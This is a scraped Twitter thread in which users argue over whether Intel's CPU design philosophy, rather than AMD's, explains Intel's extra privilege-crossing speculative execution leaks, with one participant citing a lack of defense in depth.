Is nobody attacking AMD, or is there some difference in design philosophy that has spared them from this wave of chip attacks?
-
-
Replying to @geofurb @damageboy
This isn't a chip attack, it's a stupid design bug. That said, there *is* a difference in design philosophy. Intel has chosen performance over any kind of design sanity / safety, every time, it seems as a systematic rule. AMD hasn't.
2 replies 11 retweets 87 likes -
So while both AMD and Intel have been equally hit by the general idea of speculation-based leaks in userland code (nothing the CPU can do about that), Intel has also had a huge pile of massively privilege-crossing speculation leaks that AMD hasn't.
2 replies 2 retweets 25 likes -
Because the Intel philosophy seems to have been "ignore security/sanity until the instruction retires", so all kinds of batshit insane stuff happens in speculation on Intel CPUs (like bypassing guest VM page tables or loading bad or privileged data) which doesn't on AMD.
3 replies 2 retweets 36 likes -
This “ignore security/sanity” sentiment that intel “has” is completely false; Intel internally has never had that philosophy. That’s something cooked up by reddit trolls.
1 reply 0 retweets 0 likes -
The evidence is damning. All those speculation bugs Intel had due to cross-privilege leakage prior to retirement make it clear. It's not once or twice, it's a pattern.
1 reply 0 retweets 3 likes -
Replying to @marcan42 @SteakandChickn and
By the way, I said "ignore security/sanity *until the instruction retires*". They cared about the security of the end result, they just didn't care about security along the way, and as anyone well versed in security knows, that's a recipe for disaster. Defense in depth.
1 reply 0 retweets 2 likes -
So are you suggesting it was outright outright malicious intent or laziness? Or both?
1 reply 0 retweets 0 likes -
Replying to @SteakandChickn @marcan42 and
Also – unless you’ve had engineers themselves tell you this, I wouldn’t say it’s “defense in depth”
1 reply 0 retweets 0 likes -
Neither. I bet it was a shitty policy, probably cooked up by managers, that no transistor shall be "wasted" on things that "don't matter" because the instruction will fault/roll back anyway, because that will just reduce performance for "no reason".
1 reply 0 retweets 2 likes
And they probably had a few people further down who saw the problems with this approach, and whose concerns were either ignored or stifled from the start due to corporate culture.
-
-
Replying to @marcan42 @SteakandChickn and
"defense in depth" is a common term in security, and it's what Intel didn't do (and should've). You don't build a brittle system that will crash at the first mistake, you add redundant security in case something goes wrong.
0 replies 0 retweets 2 likesThanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.